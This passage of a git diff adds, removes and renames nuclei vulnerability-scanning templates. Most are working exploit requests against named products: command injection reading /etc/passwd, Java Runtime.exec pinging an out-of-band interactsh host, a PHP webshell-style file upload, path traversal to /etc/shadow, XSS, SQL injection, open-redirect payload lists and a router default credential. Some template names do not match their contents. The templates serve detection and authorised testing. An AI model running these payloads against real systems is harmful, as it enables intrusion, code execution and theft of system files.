susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information. + reference: + - https://www.adminxe.com/2163.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: title="RG-UAC登录页面" + tags: ruijie,cnvd,cnvd2021,disclosure +requests: + - method: GET + path: + - "{{BaseURL}}/get_dkey.php?user=admin" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"pre_define"' + - '"auth_method"' + - '"name"' + - '"password"' + condition: and + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":' + +# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/Other/CNVD-2021-15822.yaml b/nuclei-templates/Other/CNVD-2021-15822.yaml index 02ff83b22e..0a1beb38a7 100644 --- a/nuclei-templates/Other/CNVD-2021-15822.yaml +++ b/nuclei-templates/Other/CNVD-2021-15822.yaml @@ -1,32 +1,22 @@ id: CNVD-2021-15822 - info: name: ShopXO Download File Read author: pikpikcu severity: high - reference: - - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog - metadata: - verified: true - shodan-query: title:"ShopXO企业级B2C电商系统提供商" - fofa-query: app="ShopXO企业级B2C电商系统提供商" - tags: shopxo,lfi,cnvd,cnvd2021 - + reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog + tags: shopxo,lfi requests: - raw: - | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - matchers-condition: and matchers: - type: regex regex: - - "root:.*:0:0:" - + - "root:[x*]:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/03/17 diff --git a/nuclei-templates/Other/CNVD-2021-26422.yaml b/nuclei-templates/Other/CNVD-2021-26422.yaml new file mode 100644 index 0000000000..c9485ec160 --- /dev/null +++ b/nuclei-templates/Other/CNVD-2021-26422.yaml @@ -0,0 +1,32 @@ +id: CNVD-2021-26422 +info: + name: eYouMail - Remote Code Execution + author: daffainfo + severity: critical + description: eYouMail is susceptible to a remote code execution vulnerability. + reference: + - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py + - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: eyoumail,rce,cnvd,cnvd2021 +requests: + - raw: + - | + POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type='|cat /etc/passwd||' + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/Other/CNVD-2022-03672.yaml b/nuclei-templates/Other/CNVD-2022-03672.yaml index b96b1bebfe..d25c9a171a 100644 --- a/nuclei-templates/Other/CNVD-2022-03672.yaml +++ b/nuclei-templates/Other/CNVD-2022-03672.yaml @@ -1,18 +1,13 @@ id: CNVD-2022-03672 info: - name: Sunflower Simple and Personal - Remote Code Execution + name: Sunflower Simple and Personal edition RCE author: daffainfo severity: critical - description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. reference: - https://www.1024sou.com/article/741374.html - https://copyfuture.com/blogs-details/202202192249158884 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: cnvd,cnvd2020,sunflower,rce requests: - raw: @@ -41,5 +36,3 @@ requests: - "contains(body_1, 'verify_string')" - "contains(body_2, 'Windows IP')" condition: and - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/Other/CRMEB-sqli.yaml b/nuclei-templates/Other/CRMEB-sqli.yaml new file mode 100644 index 0000000000..9d8c0de9d8 --- /dev/null +++ b/nuclei-templates/Other/CRMEB-sqli.yaml @@ -0,0 +1,18 @@ +id: CRMEB-sqli +info: + name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges + author: Str1am + severity: high + tags: CRMEB,sqli +requests: + - method: GET + path: + - "{{BaseURL}}/api/products?sid=1%27" + matchers-condition: and + matchers: + - type: word + words: + - "Syntax error" + - "SQLSTATE" + part: body + condition: and diff --git a/nuclei-templates/CVE-2024/CVE-2024-0195.yaml b/nuclei-templates/Other/CVE_2024_0195.yaml similarity index 100% rename from nuclei-templates/CVE-2024/CVE-2024-0195.yaml rename to nuclei-templates/Other/CVE_2024_0195.yaml diff --git a/nuclei-templates/Other/Chinaunicom-Default-Login.yaml b/nuclei-templates/Other/Chinaunicom-Default-Login.yaml deleted file mode 100755 index a222a7508d..0000000000 --- a/nuclei-templates/Other/Chinaunicom-Default-Login.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: Chinaunicom-Default-Login -info: - name: 中国联通光猫默认口令 - author: - - l0ne1y - description: |- - 中国联通光猫默认口令 - 中国联通光猫存在默认凭证CUAdmin/CUAdmin。使用该凭证容易被攻击者轻易进入后台,造成敏感信息泄漏。 - severity: high - remediation: |- - #### 官方修复方案: - 升级系统至无漏洞版本,或于官网下载安全补丁。 - #### 临时修复方案: - 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。<br />2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。<br />3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。<br />4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/)<br />5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) -requests: -- matchers: - - type: status - status: - - 302 - - type: word - part: header - words: - - /menu.gch - matchers-condition: and - raw: - - | - POST /cu.html HTTP/1.1 - Host: {{Hostname}} - - frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password= - attack: pitchfork - payloads: - password: - - CUAdmin - username: - - CUAdmin diff --git a/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml b/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml new file mode 100644 index 0000000000..5aac16e873 --- /dev/null +++ b/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml @@ -0,0 +1,25 @@ +id: siteminder-dom-based-xss +info: + name: SiteMinder DOM BASED XSS + author: Clark + severity: medium + description: SiteMinder DOM Based XSS. + tags: dom,xss + reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html +requests: + - method: GET + path: + - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' + - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'confirm(document.domain)' + - type: word + words: + - 'text/html' + part: header diff --git a/nuclei-templates/Other/Dahua_Video_FileUpload.yaml b/nuclei-templates/Other/Dahua_getUserInfoByUserName.yaml similarity index 100% rename from nuclei-templates/Other/Dahua_Video_FileUpload.yaml rename to nuclei-templates/Other/Dahua_getUserInfoByUserName.yaml diff --git a/nuclei-templates/Other/digital-signage-rce.yaml b/nuclei-templates/Other/Digital-Signage-rce.yaml similarity index 100% rename from nuclei-templates/Other/digital-signage-rce.yaml rename to nuclei-templates/Other/Digital-Signage-rce.yaml diff --git a/nuclei-templates/Other/GLPIDirectoryListing.yaml b/nuclei-templates/Other/GLPIDirectoryListing.yaml deleted file mode 100644 index 8101849542..0000000000 --- a/nuclei-templates/Other/GLPIDirectoryListing.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: GLPI_Exposed_Data -info: - author: RedTeamBrasil - description: "By default many system admins allow directory listening" - name: "Exposed data in GLPI" - reference: "N/A" - severity: high - tags: "glpi,misconfiguration,data,exposed" -requests: - - method: GET - payloads: - expose_data: - - /glpi/files/_sessions/ - - /glpi/files/_sesasdfasdsions/ - - /glpi/files/_dumps/ - - /files/_tmp/ - - /files/_uploads/ - - /files/_log/ - - /glpi/_dumps/ - - /glpi/_pictures/ - - /glpi/_sessions/ - - /glpi/_tmp/ - - /glpi/_uploads/ - - /glpi/files/_dumps/ - - /glpi/files/_pictures/ - - /glpi/files/_sessions/ - - /glpi/files/_tmp/ - - /glpi/files/_uploads/ - - /glpi/files/_log/ - - /glpi/config/ - - /files/ZIP/ - - /glpi/files/ZIP/ - raw: - - | - GET {{expose_data}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close - attack: batteringram - threads: 10 - matchers: - - part: body - type: word - words: - - "Index of" diff --git a/nuclei-templates/Other/GT-AC2900-login.yaml b/nuclei-templates/Other/GT-AC2900-login.yaml deleted file mode 100644 index bb0175987d..0000000000 --- a/nuclei-templates/Other/GT-AC2900-login.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: GT-AC2900-login -info: - name: GT-AC2900 登录绕过 - author: Str1am - severity: critical - reference: https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md - tags: AC2900,ASSUS -requests: - - raw: - - | - GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 - Host: {{Hostname}} - Cookie: asus_token=\0Invalid; clickedItem_tab=0 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "get_cfg_clientlist" - part: body - condition: and diff --git a/nuclei-templates/Other/geovision-rce.yaml b/nuclei-templates/Other/Geovision-rce.yaml similarity index 100% rename from nuclei-templates/Other/geovision-rce.yaml rename to nuclei-templates/Other/Geovision-rce.yaml diff --git a/nuclei-templates/Other/getsimple-leakage.yaml b/nuclei-templates/Other/GetSimple-leakage.yaml similarity index 100% rename from nuclei-templates/Other/getsimple-leakage.yaml rename to nuclei-templates/Other/GetSimple-leakage.yaml diff --git a/nuclei-templates/Other/hadoop-yarn-rpc-rce.yaml b/nuclei-templates/Other/Hadoop-Yarn-RPC-RCE.yaml similarity index 100% rename from nuclei-templates/Other/hadoop-yarn-rpc-rce.yaml rename to nuclei-templates/Other/Hadoop-Yarn-RPC-RCE.yaml diff --git a/nuclei-templates/Other/ssrf-injection.yaml b/nuclei-templates/Other/Header-Injection.yaml similarity index 100% rename from nuclei-templates/Other/ssrf-injection.yaml rename to nuclei-templates/Other/Header-Injection.yaml diff --git a/nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_Files.yaml b/nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_report.yaml similarity index 100% rename from nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_Files.yaml rename to nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_report.yaml diff --git a/nuclei-templates/Other/jeesite-default-login.yaml b/nuclei-templates/Other/JeeSite-default-login.yaml similarity index 100% rename from nuclei-templates/Other/jeesite-default-login.yaml rename to nuclei-templates/Other/JeeSite-default-login.yaml diff --git a/nuclei-templates/Other/Karel-ip-phone-lfi.yaml b/nuclei-templates/Other/Karel-ip-phone-lfi.yaml deleted file mode 100644 index d7f751d79f..0000000000 --- a/nuclei-templates/Other/Karel-ip-phone-lfi.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: karel-ip-phone-lfi -info: - name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion - author: 0x_Akoko - severity: high - description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. - reference: - - https://cxsecurity.com/issue/WLB-2020100038 - - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: karel,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" - headers: - Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/03 diff --git a/nuclei-templates/Other/kingdee-file-list.yaml b/nuclei-templates/Other/Kingdee-file-list.yaml similarity index 100% rename from nuclei-templates/Other/kingdee-file-list.yaml rename to nuclei-templates/Other/Kingdee-file-list.yaml diff --git a/nuclei-templates/Other/kingsoft-default-login.yaml b/nuclei-templates/Other/Kingsoft-default-login.yaml similarity index 100% rename from nuclei-templates/Other/kingsoft-default-login.yaml rename to nuclei-templates/Other/Kingsoft-default-login.yaml diff --git a/nuclei-templates/Other/kingsoft-rce.yaml b/nuclei-templates/Other/Kingsoft-rce.yaml similarity index 100% rename from nuclei-templates/Other/kingsoft-rce.yaml rename to nuclei-templates/Other/Kingsoft-rce.yaml diff --git a/nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml b/nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml deleted file mode 100644 index 2523c8afde..0000000000 --- a/nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: landray-oa-treexml-rce - -info: - name: Landray OA Treexml.tmpl - Remote Code Execution - author: tangxiaofeng7,SleepingBag945 - severity: high - description: | - There is a remote command execution vulnerability in Lanling OA treexml.tmpl. An attacker can obtain server permissions by sending a specific request package. - reference: - - https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce/blob/main/landray-oa-treexml-rce.yaml - - https://vuls.info/PeiQi/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/#_4 - metadata: - verified: true - max-request: 1 - fofa-query: app="Landray-OA系统" - tags: landray,oa,treexml,rce - -http: - - raw: - - | - POST /data/sys-common/treexml.tmpl HTTP/1.1 - Host: {{Hostname}} - Pragma: no-cache - Content-Type: application/x-www-form-urlencoded - - s_bean=ruleFormulaValidate&script=try {String cmd = "ping {{interactsh-url}}";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: body - words: - - "<RestResponse><success>" - - "<confirm>" - condition: and - - - type: status - status: - - 200 - -# digest: 4b0a0048304602210096f0ba9e6a94142423797bf77a9ada7c90c4b3df0f7a5da5c7f3dca65655cee60221009eaf25bf39f22f5cc51eb59c17943967a388d54fe9aa843d341a6ef2af2af5ce:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/magicflow-sqli.yaml b/nuclei-templates/Other/MagicFlow-sqli.yaml similarity index 100% rename from nuclei-templates/Other/magicflow-sqli.yaml rename to nuclei-templates/Other/MagicFlow-sqli.yaml diff --git a/nuclei-templates/Other/netcore-unauth.yaml b/nuclei-templates/Other/Netcore-unauth.yaml similarity index 100% rename from nuclei-templates/Other/netcore-unauth.yaml rename to nuclei-templates/Other/Netcore-unauth.yaml diff --git a/nuclei-templates/Other/netoray-sqli.yaml b/nuclei-templates/Other/Netoray-sqli.yaml similarity index 100% rename from nuclei-templates/Other/netoray-sqli.yaml rename to nuclei-templates/Other/Netoray-sqli.yaml diff --git a/nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml b/nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml new file mode 100644 index 0000000000..b35ef84818 --- /dev/null +++ b/nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml @@ -0,0 +1,49 @@ +id: Green-Alliance + +info: + name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high + description: | + Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + metadata: + fofa-query: body="'/needUsbkey.php?username='" + hunter-query: web.body="'/needUsbkey.php?username='" + + +http: + - method: GET + path: + - "{{BaseURL}}/webconf/Exec/index?cmd=id" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "200" + + - type: status + status: + - 200 + + +# http: +# - method: GET +# path: +# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" + +# attack: clusterbomb +# matchers-condition: or +# matchers: +# - type: word +# part: interactsh_protocol +# name: http +# words: +# - "http" + +# - type: word +# part: interactsh_protocol +# name: dns +# words: +# - "dns" diff --git a/nuclei-templates/Other/Nsfocus_sas_getFile_read.yaml b/nuclei-templates/Other/Nsfocus_sas_getFile_read.yaml deleted file mode 100644 index a8f9cbe173..0000000000 --- a/nuclei-templates/Other/Nsfocus_sas_getFile_read.yaml +++ /dev/null @@ -1,59 +0,0 @@ -id: Green-Alliance - -info: - name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high - description: | - Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets - metadata: - fofa-query: app="NSFOCUS-下一代防火墙" - hunter-query: web.title="用户认证 - NSFOCUS NF" - - - -http: - - raw: - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 238 - Accept-Encoding: gzip, deflate - Connection: close - - --1d52ba2a11ad8a915eddab1a0e85acd9 - Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" - - lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; - --1d52ba2a11ad8a915eddab1a0e85acd9-- - - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 217 - Accept-Encoding: gzip, deflate - Connection: close - - --4803b59d015026999b45993b1245f0ef - Content-Disposition: form-data; name="file"; filename="compose.php" - - <?php echo '{{randstr}}';unlink(__FILE__);?> - --4803b59d015026999b45993b1245f0ef-- - - - | - GET /mail/include/header_main.php HTTP/1.1 - Host: {{Host}}:4433 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 - Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 - - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1, 'upload file success')" - - "status_code_2 == 200 && contains(body_2, 'upload file success')" - - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" - condition: and diff --git a/nuclei-templates/Other/OpenRedirect.yaml b/nuclei-templates/Other/OpenRedirect.yaml new file mode 100644 index 0000000000..52afa349a8 --- /dev/null +++ b/nuclei-templates/Other/OpenRedirect.yaml @@ -0,0 +1,117 @@ +id: open-redirect +info: + name: Open URL redirect detection + author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik + severity: low + description: A user-controlled input redirects users to an external website. + tags: redirect,generic +requests: + - raw: + - | + GET /{{redirect}} HTTP/1.1 + Host: {{Hostname}} + payloads: + redirect: + - '%0a/interact.sh/' + - '%0d/interact.sh/' + - '%00/interact.sh/' + - '%09/interact.sh/' + - '%5C%5Cinteract.sh/%252e%252e%252f' + - '%5Cinteract.sh' + - '%5cinteract.sh/%2f%2e%2e' + - '%5c{{RootURL}}interact.sh/%2f%2e%2e' + - '../interact.sh' + - '.interact.sh' + - '/%5cinteract.sh' + - '////\;@interact.sh' + - '////interact.sh' + - '///interact.sh' + - '///interact.sh/%2f%2e%2e' + - '///interact.sh@//' + - '///{{RootURL}}interact.sh/%2f%2e%2e' + - '//;@interact.sh' + - '//\/interact.sh/' + - '//\@interact.sh' + - '//\interact.sh' + - '//\tinteract.sh/' + - '//interact.sh/%2F..' + - '//interact.sh//' + - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//interact.sh@//' + - '//interact.sh\tinteract.sh/' + - '//https://interact.sh@//' + - '/<>//interact.sh' + - '/\/\/interact.sh/' + - '/\/interact.sh' + - '/\interact.sh' + - '/interact.sh' + - '/interact.sh/%2F..' + - '/interact.sh/' + - '/interact.sh/..;/css' + - '/https:interact.sh' + - '/{{RootURL}}interact.sh/' + - '/〱interact.sh' + - '/〵interact.sh' + - '/ゝinteract.sh' + - '/ーinteract.sh' + - '/ーinteract.sh' + - '<>//interact.sh' + - '@interact.sh' + - '@https://interact.sh' + - '\/\/interact.sh/' + - 'interact%E3%80%82sh' + - 'interact.sh' + - 'interact.sh/' + - 'interact.sh//' + - 'interact.sh;@' + - 'https%3a%2f%2finteract.sh%2f' + - 'https:%0a%0dinteract.sh' + - 'https://%0a%0dinteract.sh' + - 'https://%09/interact.sh' + - 'https://%2f%2f.interact.sh/' + - 'https://%3F.interact.sh/' + - 'https://%5c%5c.interact.sh/' + - 'https://%5cinteract.sh@' + - 'https://%23.interact.sh/' + - 'https://.interact.sh' + - 'https://////interact.sh' + - 'https:///interact.sh' + - 'https:///interact.sh/%2e%2e' + - 'https:///interact.sh/%2f%2e%2e' + - 'https:///interact.sh@interact.sh/%2e%2e' + - 'https:///interact.sh@interact.sh/%2f%2e%2e' + - 'https://:80#@interact.sh/' + - 'https://:80?@interact.sh/' + - 'https://:@\@interact.sh' + - 'https://:@interact.sh\@interact.sh' + - 'https://:@interact.sh\@WillBeReplaced.com' + - 'https://;@interact.sh' + - 'https://\tinteract.sh/' + - 'https://interact.sh/interact.sh' + - 'https://interact.sh/https://interact.sh/' + - 'https://www.\.interact.sh' + - 'https:/\/\interact.sh' + - 'https:/\interact.sh' + - 'https:/interact.sh' + - 'https:interact.sh' + - '{{RootURL}}interact.sh' + - '〱interact.sh' + - '〵interact.sh' + - 'ゝinteract.sh' + - 'ーinteract.sh' + - 'ーinteract.sh' + - '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh' + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - type: status + status: + - 301 + - 302 + - 307 + - 308 + condition: or diff --git a/nuclei-templates/Other/Oracle-OAM-XSS.yaml b/nuclei-templates/Other/Oracle-OAM-XSS.yaml deleted file mode 100644 index 904ec6970b..0000000000 --- a/nuclei-templates/Other/Oracle-OAM-XSS.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: Oracle-OAM-XSS -info: - name: Oracle OAM - XSS - author: dk4trin - severity: medium - description: Cross-site scripting (XSS) on Oracle OAM - tags: xss,oracle -requests: - - method: GET - path: - - '{{BaseURL}}/oam/pages/error.jsp?error=javascript%3A%2F%2Axssx%27%22%3E--%3E%3C%2Fnoscript%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3C%2Fstyle%3E%3C%2Ftemplate%3E%3C%2Fnoembed%3E%3C%2Fscript%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%2F%2F%3E%2A%2F%3Btop.alert%282%29%2F%2F' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "alert(1)//>*/;top.alert(2)//" - part: body - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/Other/Path-Traversal.yaml b/nuclei-templates/Other/Path-Traversal.yaml deleted file mode 100644 index 09b46ce63d..0000000000 --- a/nuclei-templates/Other/Path-Traversal.yaml +++ /dev/null @@ -1,67 +0,0 @@ - -id: LFI - -info: - name: Local File Inclusion - author: pikpikcu - severity: high - -requests: - - method: GET - path: - - '{{BaseURL}}/etc/passwd' - - '{{BaseURL}}/etc/shadow%00' - - '{{BaseURL}}/etc/passwd' - - '{{BaseURL}}/etc/passwd%00' - - '{{BaseURL}}../etc/passwd' - - '{{BaseURL}}../etc/passwd%00' - - '{{BaseURL}}../../etc/passwd' - - '{{BaseURL}}../../etc/passwd%00' - - '{{BaseURL}}../../../etc/passwd' - - '{{BaseURL}}../../../etc/passwd%00' - - '{{BaseURL}}../../../../etc/passwd' - - '{{BaseURL}}../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../etc/passwd' - - '{{BaseURL}}../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00' - - '{{BaseURL}}../../../../../../etc/passwd&=%3C%3C%3C%3C' - - matchers: - - type: 